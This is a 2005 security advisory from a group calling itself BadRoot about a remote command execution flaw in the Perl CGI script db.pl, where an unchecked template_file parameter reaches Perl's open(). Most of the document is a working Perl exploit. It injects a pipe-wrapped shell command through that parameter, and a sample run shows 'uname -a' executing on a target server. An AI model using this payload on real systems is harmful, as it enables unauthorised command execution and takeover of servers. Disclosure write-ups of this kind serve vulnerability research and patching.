BadRoot Security Advisory 2005-#0x02

-----------------------------------------
Author ........  Spher3
Date ..........  17-06-2005
Product .......  db.pl
Type ..........  Remote Command Execution
------------------------------------------

Description:
------------
This script can open a template html,
but in this script the variable that 
can open template file it is not controlled.

Vulnerable code:
----------------
[...] 
open(FILE, $TEMPLATE_DIR.$cgi_query->param("template_file")) 
[...]

Proof of Concept:
-----------------
#!/usr/bin/perl

#
# Authors .... Shawn` feat Spher3
# Vulnerability discovered by Spher3 @ 17-06-2005
# EX-Private Edition :)
#
# -----------------------------------------------------------------------
#
# bash-3.00$ perl db www.example.org /cgi-bin/ "uname -a"
# Target: www.example.org
# Path: /cgi-bin/
#
# FreeBSD example.org 4.10-RELEASE-p10 FreeBSD 4.10-RELEASE-p10 #0: 
# Wed Jun 30 19:03:56 CEST 2004 root@example.org:/usr/obj/usr/src/sys/S43
#
# -----------------------------------------------------------------------
#
# BadRoot Security Group
#

use LWP::Simple;
use strict;

sub usage
{
  print "Usage:\nperl $0 [target] [path] [cmd]\n",
        "Examples:\nperl $0 www.example.com /cgi-bin/ \"uname -a\"\n\n";
  exit(0);
}

usage if(! $ARGV[2] or !($ARGV[1]=~m/\//));

print "Target: $ARGV[0]\n",
      "Path: $ARGV[1]\n\n";

my $VULN = "db.pl?template_file=|$ARGV[2]|";
my $RES = getprint("http://".$ARGV[0].$ARGV[1]. $VULN);

# e0f